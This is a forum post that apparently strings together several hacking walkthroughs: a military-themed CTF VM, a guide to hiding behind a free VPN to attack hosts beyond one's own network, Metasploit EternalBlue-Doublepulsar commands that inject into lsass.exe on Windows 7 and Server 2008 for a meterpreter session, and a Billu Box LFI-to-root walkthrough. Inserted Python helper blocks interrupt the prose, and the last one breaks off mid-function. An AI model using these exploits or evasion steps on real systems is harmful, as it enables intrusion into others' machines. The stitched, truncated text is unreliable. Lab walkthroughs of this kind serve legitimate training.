05-02-2020, 11:45 AM
Are you ready for the challenge, soldier? The first step of an attack is to identify the target. So, identify your target. To identify the target we will use the following command:

```
netdiscover
```
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-GiWjeFofhDs/WQnvFVsVv3I/AAAAAAAAP7w/a_QGoZekuiEiGTruHW8c8B4VlOIAPaD2gCLcB/s1600/1.png?w=687&ssl=1)
Now that you have identified your target (mine is 192.168.1.17), you will need to acquire it and declare your victory. In order to acquire it we need a plan to enter the enemy's territory, so let us search for all the doors, closed or not. For that, let's fire up nmap.

```
nmap -p- -A 192.168.1.17
```
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-2lYQ6gU1plg/WQnvIR5qnDI/AAAAAAAAP8g/OBEBBNTnSKstw-lF41xcrWfAj5bpnRmuQCEw/s1600/2.png?w=687&ssl=1)
Our search has led us to the result that ports 21, 80, 443 and 2225 are open, with the services FTP, HTTP, HTTPS and SSH respectively. As port 80 is open, we can open our target IP in the browser.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-L0w3Obxwue4/WQnvJqeWU6I/AAAAAAAAP88/zRdNnMK_yDcg-GqRkzsy9VfjBOrKrSazgCEw/s1600/3.png?w=687&ssl=1)
But there is no hint whatsoever in there. However, as this VM is military-themed, the hint could be camouflaged. Therefore let's check the source code.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-nh71dJIow6Y/WQnvJ2RoIaI/AAAAAAAAP9A/yA_MJnP4K18RkMOQCjGBzDpm2gQdRBZ2ACEw/s1600/4.png?w=687&ssl=1)
And yes!! We have found flag 0, although it is base64-encoded. Upon decoding it becomes netdiscover.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-GuKQ5FFeyN4/WQnvJzrO0jI/AAAAAAAAP9E/k-GM_a4uZ24HWOttNNRLdpC-vHX73va9ACEw/s1600/5.png?w=687&ssl=1)
As the source is unknown territory, I inspected it further and found a file that proved to be very useful: assests/lafiya.js
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/--m_2QIuhKc8/WQnvKDYXcGI/AAAAAAAAP9I/w-o0GdiCH2obQEPEO3vhuqjO05Z_AEk0QCEw/s1600/6.png?w=687&ssl=1)
Open that file in the browser and check its source. In the source, you will find flag 1, which is in hex.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-1c25K4XYlKU/WQnvKrGtihI/AAAAAAAAP9Y/lgNPe1p5MvUzOuRGFaBFdTvvpxNPoSetwCEw/s1600/7.png?w=687&ssl=1)
Upon converting the hex, you will uncover flag 2 in MD5 form.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-ZZz3TpAWl4A/WQnvKlXZpjI/AAAAAAAAP9Y/LTRHQ4c-IDMEOZJHPr7-tCKEGOLX1zjlwCEw/s1600/8.png?w=687&ssl=1)
When you reverse the MD5 hash to its original value, it turns out to be nmap, as shown in the image below.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-7Kos-EoILHE/WQnvK3nNBDI/AAAAAAAAP9Y/n4JnZkhT7RcyXgGYPNhTxYzZVNu0Ia-hACEw/s1600/9.png?w=687&ssl=1)
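The decoding chain used above (base64, then hex, then an MD5 lookup) carried out offline, as an added Python example that is not part of the original post. The flag values here are constructed: the base64 string encodes "netdiscover" and the MD5 digest is computed from "nmap" at run time, since the real flags only appear in the screenshots. The small wordlist stands in for the online hash-lookup site the author used, which is also why `lookup_md5` can only succeed when the preimage is in the list.

```python
import base64
import binascii
import hashlib

# Constructed sample flags (not the VM's real values, which only appear in the screenshots).
SAMPLE_FLAG0_B64 = base64.b64encode(b"netdiscover").decode()   # "bmV0ZGlzY292ZXI="
SAMPLE_MD5_NMAP = hashlib.md5(b"nmap").hexdigest()               # 32 hex characters
SAMPLE_FLAG1_HEX = SAMPLE_MD5_NMAP.encode().hex()               # hex of the ASCII digest

# Constructed mini-wordlist standing in for an online MD5 lookup service.
WORDLIST = ["netdiscover", "nmap", "dirb", "unit", "admin", "root"]


def decode_base64(value: str) -> str:
    """Decode a base64 flag; padding is restored if it was stripped when copying."""
    stripped = value.strip()
    padded = stripped + "=" * (-len(stripped) % 4)
    return base64.b64decode(padded).decode("utf-8")


def decode_hex(value: str) -> str:
    """Decode a hex flag; spaces and an optional 0x prefix are removed first."""
    cleaned = value.strip().lower().replace(" ", "")
    if cleaned.startswith("0x"):
        cleaned = cleaned[2:]
    return binascii.unhexlify(cleaned).decode("utf-8")


def looks_like_md5(value: str) -> bool:
    """MD5 digests are exactly 32 hex characters; a cheap sanity check before a lookup."""
    v = value.strip().lower()
    return len(v) == 32 and all(c in "0123456789abcdef" for c in v)


def lookup_md5(digest: str, wordlist=WORDLIST):
    """Reverse an MD5 digest by hashing each candidate (MD5 itself is not invertible)."""
    if not looks_like_md5(digest):
        raise ValueError("not an MD5 digest: %r" % digest)
    target = digest.strip().lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None  # preimage not in the wordlist


DECODERS = {"base64": decode_base64, "hex": decode_hex, "md5": lookup_md5}


def decode_chain(value: str, steps):
    """Apply the named decoders in order, e.g. ["hex", "md5"] for flag 1 -> flag 2 -> nmap."""
    current = value
    for step in steps:
        current = DECODERS[step](current)
        if current is None:
            raise LookupError("MD5 lookup failed at step %r" % step)
    return current


if __name__ == "__main__":
    print("flag 0 ->", decode_chain(SAMPLE_FLAG0_B64, ["base64"]))
    print("flag 1 ->", decode_chain(SAMPLE_FLAG1_HEX, ["hex", "md5"]))
```

The `steps` list makes the order explicit rather than guessing the encoding from the alphabet, because a short plaintext word like "nmap" is itself a valid base64 string and an automatic guesser would keep decoding past the answer.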
The second flag was nmap, which means there is something in the nmap output that we missed. Upon reviewing it I remembered that the SSH service was open on port 2225, so I accessed it with the following command.

```
ssh 192.168.1.17 -p 2225
```
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-_yXMag8bHTc/WQnvFHhtblI/AAAAAAAAP9Y/t7r8_CznumkjEg7MeiS-Sn2zkvILBJFPACEw/s1600/10.png?w=687&ssl=1)
And there we have it, our flag 2B as an MD5 value. Let's convert it.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-YvvAHhUY0ME/WQnvFd8G0BI/AAAAAAAAP9Y/swxT0FFbnBUHmeQXrP99g5vuwrUciiwaACEw/s1600/11.png?w=687&ssl=1)
Our flag 2B is encrypted. That means there is something related to encryption and security. Now, the best way to provide security to a website is through its security certificate, so let's check it out.
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-jDwv1xCZTz8/WQnvF9OHcjI/AAAAAAAAP9Y/rBlwcKBhDzwZzl5SLe6DlC85sBbWC-mUgCEw/s1600/12.png?w=687&ssl=1)
Now, upon examining the certificate, you will find your third flag and a hint, i.e. [39 39 30].
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-csqW9RDPEkQ/WQnvGHZQCSI/AAAAAAAAP9Y/1TG0pIYtPxEzhKz7od2rIEq2NGK80WVxQCEw/s1600/13.png?w=687&ssl=1)
First, decode the flag, which will be unit. Now, if you decode it anywhere else you will not get a result. I searched and searched again but couldn't get it to decode. So I visited the author's walkthrough, and there it says that it translates to unit. Therefore I used unit in my walkthrough.
![[Image: 14.1.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-71SAUb8_Wmg/WQnvF-YwPnI/AAAAAAAAP9Y/pTtjDu0hcGwdZqN6Qodh3H-FwdPRyhMLgCEw/s1600/14.1.png?w=687&ssl=1)
The combinations of 3, 9 and 0 will be the suffix of the word unit. But there are a lot of combinations, so let's generate them with the help of crunch, using the command:

```
crunch 3 3 390
```
![[Image: 14.2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-ea7JuD7pllI/WQnvGOTZBWI/AAAAAAAAP9Y/-w0c152V3GIk5pQKk6v9TC3sSj4bom_BwCEw/s1600/14.2.png?w=687&ssl=1)
We get 27 possible combinations, so make a text file for the dictionary attack and add the word 'unit' as a prefix to every combination. Now let's use dirb to find anything related to unit and these combinations.
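The wordlist step above (crunch's 27 three-character combinations of 3, 9 and 0, each prefixed with "unit") reproduced in Python, as an added example that is not part of the original post and not crunch's own code. The function and file names are the example's own; it writes the same one-word-per-line format that dirb reads.

```python
from itertools import product


def crunch_like(min_len: int, max_len: int, charset: str):
    """Yield every string of length min_len..max_len over charset, in crunch's order:
    shorter lengths first, then lexicographic in the order the charset was given."""
    chars = "".join(dict.fromkeys(charset))  # drop repeated characters, keep order
    for length in range(min_len, max_len + 1):
        for combo in product(chars, repeat=length):
            yield "".join(combo)


def build_dictionary(prefix: str, min_len: int, max_len: int, charset: str):
    """Prefix every combination, e.g. unit + 333, 339, 330, ... -> unit333, unit339, ..."""
    return [prefix + suffix for suffix in crunch_like(min_len, max_len, charset)]


def write_dictionary(path: str, words) -> int:
    """Write one word per line (the wordlist format dirb expects); return the count written."""
    with open(path, "w", encoding="ascii") as fh:
        for word in words:
            fh.write(word + "\n")
    return len(words)


if __name__ == "__main__":
    words = build_dictionary("unit", 3, 3, "390")          # 27 candidates, unit333 .. unit000
    print(len(words), "candidates; first:", words[0], "last:", words[-1])
    write_dictionary("dict.txt", words)                    # e.g. /root/Desktop/dict.txt in the post
```

Three positions over a three-character alphabet gives 3^3 = 27 words, which matches the count the author reports; the candidate unit990 that dirb later finds is one of them.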
```
dirb [target URL not shown in source] /root/Desktop/dict.txt
```

![[Image: 14.3.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-HMpKEDzYj9s/WQnvGWtn7qI/AAAAAAAAP9Y/uRGyZtL31vU1gQTgQoW_h2qGX9hUmQJowCEw/s1600/14.3.png?w=687&ssl=1)
To our joy, there is a directory that goes by unit990. Let's open it in our browser without further delay.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-YX6aQnBcDC0/WQnvGydPjSI/AAAAAAAAP9Y/2kvamGuzNPQMGs545Hh5PriXQP_3-sE8ACEw/s1600/14.png?w=687&ssl=1)
We do not have credentials for logging in, so I checked its source code instead. In the source code you will find flag 4, base64-encoded.
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-O5sFofubC_g/WQnvGznmJrI/AAAAAAAAP9Y/Zk3xSG67ZzkQYFhbiX8vj0ksZRWU2csxgCEw/s1600/15.png?w=687&ssl=1)
Decode the flag and you will get admin.php.
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-QxwqQeQpa5g/WQnvG6W9X_I/AAAAAAAAP9Y/CMUdMhx1Y_YBow-GlvBOWLGo3chzPyDpACEw/s1600/16.png?w=687&ssl=1)
After finding the flag, I opened the directory in the browser.
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-qxHXmVGRsD4/WQnvHlXn3FI/AAAAAAAAP9Y/MR3FTGi3H_0q0z6sMYkhDlGGlB0DiZzGQCEw/s1600/17.png?w=687&ssl=1)
Opening the previously found directory in the browser shows the same page, but its source code is different. When you check it, you will find flag 5, again base64-encoded.
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-8BlgVVUX4M0/WQnvHqwwG9I/AAAAAAAAP9Y/JC74aMKVB7gzmK7z4ioTqH8Bd9b04H1hQCEw/s1600/18.png?w=687&ssl=1)
Decoding flag 5 gives SQL injection. That means the next step should be SQL injection.
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-KyiBuRrvzkc/WQnvHkHxtdI/AAAAAAAAP9Y/xzrh71ImtD4C4LufIDh3oO_VrZ6oKBraACEw/s1600/19.png?w=687&ssl=1)
Now, this hint is just to throw us off track. I used every SQL injection technique I could find, but it didn't help. So I used dirb on the target.

```
dirb [target URL not shown in source]
```
![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-FhtF7M69LIQ/WQnvITH9hoI/AAAAAAAAP9Y/JKn9VGaDK5oo9e9OBsIM7jnc35YFwISVwCEw/s1600/20.png?w=687&ssl=1)
I found a directory called assets, opened it in the browser and found the 7th flag.
![[Image: 21.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-3UG3DJRJSHI/WQnvIdj8YiI/AAAAAAAAP9Y/XHzqHdMs6MYnBYBMv0ybu39PnH91ot-XQCEw/s1600/21.png?w=687&ssl=1)
Now try and decode it: widgets.
![[Image: 22.1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-Q-2JqNA6ep0/WQn4T_ociPI/AAAAAAAAP9k/CGQNyhIId9UOsCKlxGLsXgFe12B7kIGOwCLcB/s1600/22.1.png?w=687&ssl=1)
You can try to decode it, but it's hopeless to decode it anywhere online. So I examined the dirb result further and found another directory called phpmyadmin.
![[Image: 22.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-MaCo8GoVLLI/WQnvI8dXv4I/AAAAAAAAP9Y/nUTnHs6IpRsNokSe4hBLHwBzSQZh46-PgCEw/s1600/22.png?w=687&ssl=1)
If you open this directory in the browser you will find a login page. I tried the top 10 most commonly used usernames and passwords, i.e. root and root, and got in. In the database I found a silex table. Now, silex is the team's name, so I guess this is the most important table.
![[Image: 23.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-0xBLz-aRaz0/WQnvJEAypvI/AAAAAAAAP9Y/yAak41qBORc-kI6OhMJPIUI7JiiuxqAGQCEw/s1600/23.png?w=687&ssl=1)
Upon checking it, I found the admin entry, and in admin there was our 6th flag, base64-encoded.
![[Image: 24.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-hdEfVnCliQg/WQnvJFiPtLI/AAAAAAAAP9Y/reEwjfCIrvM8GMWSHHYQjRUqzryHjkWkACEw/s1600/24.png?w=687&ssl=1)
Upon decoding, it says Nigiarforcecloud.
![[Image: 25.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-MAl-n1nzTh8/WQnvJch-9LI/AAAAAAAAP9Y/ZZu30gjlLqIlC5JrNd_cXYvFTTIcNqvFwCEw/s1600/25.png?w=687&ssl=1)
And voila!! All our flags are uncovered. Good work, soldiers. Solving this VM was a good exercise; I salute the fallen Nigerian soldiers, wish them peace and praise the whole army.
In this article you will learn how an attacker can use an anonymous VPN service to obtain a public IP, which will surely expand your target list: you will be able to attack outside your own network as well.
Let’s Start!
In your Kali Linux, open the terminal and type the following commands to install PPTP support for the VPN configuration.

```
apt-get install network-manager-pptp
```
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-KFfyWW4wrWg/WQd0x5l-QpI/AAAAAAAAP6s/ce48DVXJcp0DL_VPj_h9H30em7QnDUI5ACLcB/s1600/1.png?w=687&ssl=1)
```
apt-get install network-manager-pptp-gnome
```
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-cC0we6-d2L4/WQd0y3Bx79I/AAAAAAAAP68/RwHRqHWnaVoXp34hqzR3vJEmNehqONywACEw/s1600/2.png?w=687&ssl=1)
ipjetable.net is a website that provides a free VPN service to its registered users, but the site would only open through a proxy server, so I took the help of free-proxy.xyz to open the ipjetable.net web page.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-opwPmdPzfm8/WQd0zK2FO6I/AAAAAAAAP7A/cl37VFMm0KMwh7YZsRXJ-iEh1LB-ENN2gCEw/s1600/3.png?w=687&ssl=1)
Here you need to unlock the website so that you can use the VPN service anonymously. Click on the "I subscribe" tab. Here I used Google Translate.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-83rkVrF9xTI/WQd0zSfNGLI/AAAAAAAAP7E/08q_uRktexIyTbf4ziUXhDnPVOfO1x-JACEw/s1600/4.png?w=687&ssl=1)
Then it requires registration to unlock the VPN service; give your email id for registration. I used a temporary email id for registration.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-iBt9jk2lmoM/WQd0zZYT-dI/AAAAAAAAP7I/QGM4YNRl1bU5Us670x7IoE9GcIJxgyTbgCEw/s1600/5.png?w=687&ssl=1)
When you register on the website, it sends a mail to your inbox containing the username and password we will use for the VPN login. In the given screenshot you can see we have highlighted the link; copy this link.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-u5lFuFwZ2Os/WQd0z3GN4-I/AAAAAAAAP7M/nvprFHiMUZMott7vxW26UWUyWCsizb3AQCEw/s1600/6.png?w=687&ssl=1)
Now paste the copied link into free-proxy.xyz, as done above, to unlock the login page for the VPN service. When you unlock it, the web page shown below opens in the browser and asks for login credentials; give the username and password received through the mail.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-1EE6vFVXToU/WQd0z5Fhy4I/AAAAAAAAP7Q/3gQJIr2PdNUXC_rNrCigoMmZNdszvnlqwCEw/s1600/7.png?w=687&ssl=1)
Now click on "install ipjetable", which starts the VPN service installation for your local network.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-CM3fWmaKp44/WQd00ROfBLI/AAAAAAAAP7U/hFlgAbxCIZwSn6SuwFu-cIto8T-WW9NowCEw/s1600/8.png?w=687&ssl=1)
Inside your Kali Linux, click on the power icon in the right-hand corner of the screen to configure the VPN, then select the wired connection.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-kdXsAqViz9A/WQd00qYXyyI/AAAAAAAAP7Y/Mvd58HcN2iIJhtnQRRjrNv61k_Vw7NtCACEw/s1600/9.png?w=687&ssl=1)
Now click on (+) “plus” to add a new network connection.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-ImNu_mgZByo/WQd0xi221mI/AAAAAAAAP6k/s-WbdU1jHJc-7mWGSb0ZHtCY5FNV3mG3gCEw/s1600/10.png?w=687&ssl=1)
Select Point-to-Point Tunneling Protocol (PPTP).
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-Cna7P2zl9qk/WQd0xk9ycsI/AAAAAAAAP6o/i4pk_-zwWC4V8qEriIFxmXtZibWEQ4EWQCEw/s1600/11.png?w=687&ssl=1)
Now add the username and password to connect to the VPN server. Then click on the Advanced tab and select the radio button "store password only for this user".
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-9xf5en0Kei8/WQd0yLViZ0I/AAAAAAAAP6w/Y9tFrvpTmUwU2lGCMq-IgvcunprF58JxwCEw/s1600/12.png?w=687&ssl=1)
As in the given screenshot, select the checkboxes for PPTP authentication and encryption; once all configuration is complete, click OK. Up to here we have configured the VPN service successfully in our Kali Linux.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-xxW7D9sPQTA/WQd0yui8e_I/AAAAAAAAP60/Ha4mgnP1YWsDVSxKM8D9_e6GitMmR1_WQCEw/s1600/13.png?w=687&ssl=1)
Let's check the VPN IP that we have obtained:

```
ifconfig
```
From the screenshot you can read that 192.168.0.102 is my local IP and 141.255.151.15 is our public IP. Now use this IP for your attack, even outside your own network.
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-eb_juYVyPCU/WQd0yhBeEBI/AAAAAAAAP7c/2C2wL8rkOEgvh6fM2HLjn1GTbVvpfyRVACEw/s1600/14.png?w=687&ssl=1)
In this article we are sharing a recent zero-day exploit which requires the Metasploit framework to attack other Windows-based systems. This exploit is a combination of two tools: "Eternal Blue", which is used as a backdoor into Windows, and "Doublepulsar", which is used for injecting a DLL file with the help of a payload. So we will manually add this exploit to the Metasploit framework and step up to attacking Windows Server 2008.
Attacker: Kali Linux
Target: Windows 7 and Windows Server 2008
Let’s Start!
Open the terminal in Kali Linux and type the following command to download this exploit from GitHub.

```
git clone [repository URL not shown in source]
```
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-N7uRdI4cn5Q/WQYa0yXfMxI/AAAAAAAAP6Q/19xrQTggoRgNxJMKZwRD8Y_MFfSaVH--gCLcB/s1600/1.png?w=687&ssl=1)
Once the required exploit has been downloaded, open the folder and copy the Eternal Blue-Doublepulsar .rb ruby file so that we can add this exploit to Metasploit.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-8_SWYRndyy4/WQYa0lenYMI/AAAAAAAAP6I/Gr_YZ2nagcw7vNSFQS_GBl5nngTZwwmRQCEw/s1600/2.png?w=687&ssl=1)
Now paste the copied ruby file into the path /usr/share/metasploit-framework/modules/exploits/windows/smb, which adds this exploit to the Metasploit framework.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-raaOsYxiu4g/WQYa0tfa5PI/AAAAAAAAP6M/tf6ycj3wmEQ5ykCKKKzXd31ZwV6a2wdTQCEw/s1600/3.png?w=687&ssl=1)
Then load the Metasploit framework and type the following to test the zero-day exploit:

```
msfconsole
```
This module exploits the vulnerability in the SMBv1 and SMBv2 protocols through EternalBlue. After that, DoublePulsar is used to remotely inject a malicious DLL.
```
use windows/smb/eternalblue_doublepulsar
msf exploit (eternalblue_doublepulsar)> set eternalbluepath /root/Desktop/eternalblue_doublepulsar-metasploit/deps
msf exploit (eternalblue_doublepulsar)> set doublepulsarpath /root/Desktop/eternalblue_doublepulsar-metasploit/deps
msf exploit (eternalblue_doublepulsar)> set targetarchitecture x64
msf exploit (eternalblue_doublepulsar)> set processinject lsass.exe
msf exploit (eternalblue_doublepulsar)> set lhost 192.168.1.6
msf exploit (eternalblue_doublepulsar)> set rhost 192.168.1.104
msf exploit (eternalblue_doublepulsar)> exploit
```
Hence, from the screenshot you can observe that we only need to set the target's architecture and IP before launching the exploit; once all the information is set, launch your attack, which will give you a meterpreter session, as I have obtained.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-adbJl89EMns/WQYa1OB-ZmI/AAAAAAAAP6U/5ubjDima6l0Bq0IY1pK-d9h5RbztyeyzQCEw/s1600/5.png?w=687&ssl=1)
Hi friends! Once again we are here with a new vulnerable lab challenge, "Billu Box", created by Manish Kishan Tanwar. In it the attacker mainly needs to escalate privileges to gain root access. You can download it from [link not shown in source]. Let's breach!!!
Open the terminal in your Kali Linux and scan your network using the netdiscover command; from the scanning result I got the target IP 192.168.0.102.
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-34Sn6UGPAG8/WQYL7NXswgI/AAAAAAAAP5M/agCVhzD2qvsFE7kgBF9y_pzCEwoHP5IUgCLcB/s1600/1.png?w=687&ssl=1)
Then use an nmap aggressive scan for port and protocol enumeration:

```
nmap -p- -A 192.168.0.102
```
So here I found that ports 22 and 80 are open, for SSH and HTTP respectively.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-td5x2qyN1Z8/WQYL7_-eb-I/AAAAAAAAP5Y/G50Vd3eqVn8vAjnMygfLKRKCpACtfOaNACLcB/s1600/2.png?w=687&ssl=1)
Since port 80 is open, I explored the target IP in the browser, but here I didn't get any remarkable result.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-dVKCII40dyY/WQYL8bcROpI/AAAAAAAAP5c/HgU2Ui-xntI9PT_VpVngoGlTnCZ9l90iQCLcB/s1600/3.png?w=687&ssl=1)
Without wasting time I chose another tool, dirb, for a directory brute-force attack. To start the brute-force attack for directories:

```
dirb [target URL not shown in source] /usr/share/wordlists/dirb/big.txt
```

Awesome! We have stepped in the right direction and dug out many directories, but when you look at the given screenshot you will see I have highlighted the "test" directory. So now I will go with the test directory.

![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-Kw2S2SZ0gZ0/WQYL8bWOomI/AAAAAAAAP5k/X_9qzNpkPHIFgu_OgdckVb3y4KbaWfgagCLcB/s1600/4.png?w=687&ssl=1)
So when I opened the test.php file in the browser, I found the message "file parameter is empty please provide file path in file parameter", where the file parameter is vulnerable to LFI.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-0j0ylf_3SAg/WQYL8R86pbI/AAAAAAAAP5g/Mu2KgfoHTsgyxxFL0CgRazWOJJ5dRwBHgCLcB/s1600/5.png?w=687&ssl=1)
Using the HackBar tool, which is a Firefox plug-in, and taking advantage of the LFI vulnerability, I tried to include index.php via the file parameter: file=index.php
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-laMVAP885xQ/WQYL80t_XcI/AAAAAAAAP5o/Xx0Gb0jvUdYkYQM228o9LQFzm0159r_pACLcB/s1600/6.png?w=687&ssl=1)
So when I opened the index.php file, I found that another file, c.php, is included.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/--_9Ds1-LBso/WQYL9DhRAxI/AAAAAAAAP5w/2HcHzrC6SDA6PgvHt-KpIL61v3IcLHqxACLcB/s1600/7.png?w=687&ssl=1)
So again, with the help of HackBar, I looked at the c.php file via file=c.php for further enumeration, so that we could find some clue to exploit the target.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-imYrm-wpBvw/WQYL9FPbcZI/AAAAAAAAP5s/rL7gp-gGoPc2kehIj7HpARcRIDXP0cMQQCLcB/s1600/8.png?w=687&ssl=1)
When I read the c.php file I got some information about the connected database, and the highlighted text looks like credentials for the database.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-G4g9IFQQSfo/WQYL9TyZlLI/AAAAAAAAP50/eGoNLhlgti0axJJV7p8lf8fuAAYRD--QQCLcB/s1600/9.png?w=687&ssl=1)
If you remember the result of the dirb tool, it had revealed another directory, phpmy, so I will go with phpmy for further enumeration.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-qTJh50MXYBc/WQYL7MgRQ2I/AAAAAAAAP5E/X7g1sqpx6UkkppibGGwzXEn8Ag_6W6v0gCLcB/s1600/10.png?w=687&ssl=1)
Then, again taking advantage of the LFI, I explored config.inc.php via file=/var/www/phpmy/config.inc.php
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-sXq4GK8aiSQ/WQYL7Fu0-WI/AAAAAAAAP5I/EWgL-U08CvA972w5wzU9oG0UT-Mt1mMDwCLcB/s1600/11.png?w=687&ssl=1)
Last but not least, we have finally achieved something very remarkable: in the given screenshot you can read from the config.inc.php file that I have found the server's login username and password, root:toor.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-TTWccwQdOgo/WQYL7uEiTNI/AAAAAAAAP5Q/NFUlnRDtFrg1hQJ0knQSIQNjWsQQChc5wCLcB/s1600/12.png?w=687&ssl=1)
From the port enumeration result we found port 22 open for SSH, therefore I tried root:toor for the SSH login. When I used these credentials for SSH login I got root access, hence the given challenge is completed.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-vX4ARQ_aorc/WQYL7irpcsI/AAAAAAAAP5U/XeKRVzzPU4cISexrxVJ6FdlkRmzpi2KogCLcB/s1600/13.png?w=687&ssl=1)
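A defender's view of the `file` parameter in test.php from the Billu Box walkthrough above, as an added Python example that is not part of the original post or of the VM's own code. `safe_include_target` shows the allowlist check that a hardened test.php would apply, and `find_lfi_attempts` runs a simple detection over constructed Apache-style access-log lines modelled on the requests made in the walkthrough (file=index.php, file=c.php, file=/var/www/phpmy/config.inc.php). The allowlist, the log lines and all function names are assumptions for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical allowlist for a hardened test.php: the include target must be one of these names.
ALLOWED_INCLUDES = {"index.php", "about.php"}

# Constructed access-log lines modelled on the requests made in the walkthrough (not real logs).
SAMPLE_ACCESS_LOG = [
    '192.168.0.5 - - [01/May/2017:10:00:01 +0000] "GET /test.php HTTP/1.1" 200 80',
    '192.168.0.5 - - [01/May/2017:10:00:09 +0000] "GET /test.php?file=index.php HTTP/1.1" 200 512',
    '192.168.0.5 - - [01/May/2017:10:00:20 +0000] "GET /test.php?file=c.php HTTP/1.1" 200 300',
    '192.168.0.5 - - [01/May/2017:10:00:41 +0000] "GET /test.php?file=/var/www/phpmy/config.inc.php HTTP/1.1" 200 900',
    '192.168.0.5 - - [01/May/2017:10:00:55 +0000] "GET /test.php?file=%2Fvar%2Fwww%2Fphpmy%2Fconfig.inc.php HTTP/1.1" 200 900',
    '192.168.0.7 - - [01/May/2017:10:01:30 +0000] "GET /phpmy/ HTTP/1.1" 200 2048',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def safe_include_target(file_param: str):
    """Hardened counterpart of the vulnerable parameter: decode once, then accept only an
    exact allowlisted name. Paths, traversal and stream wrappers can never match."""
    name = unquote(file_param)
    return name if name in ALLOWED_INCLUDES else None


def is_lfi_attempt(file_param: str) -> bool:
    """Flag values that can only mean reading outside the intended files: absolute paths,
    directory traversal, PHP stream wrappers and null bytes. Decoding twice also catches
    double-encoded variants."""
    v = unquote(unquote(file_param)).replace("\\", "/").lower()
    return (v.startswith("/")
            or "../" in v
            or "\x00" in v
            or re.match(r"^[a-z]+://", v) is not None
            or v.startswith("data:"))


def parse_line(line: str):
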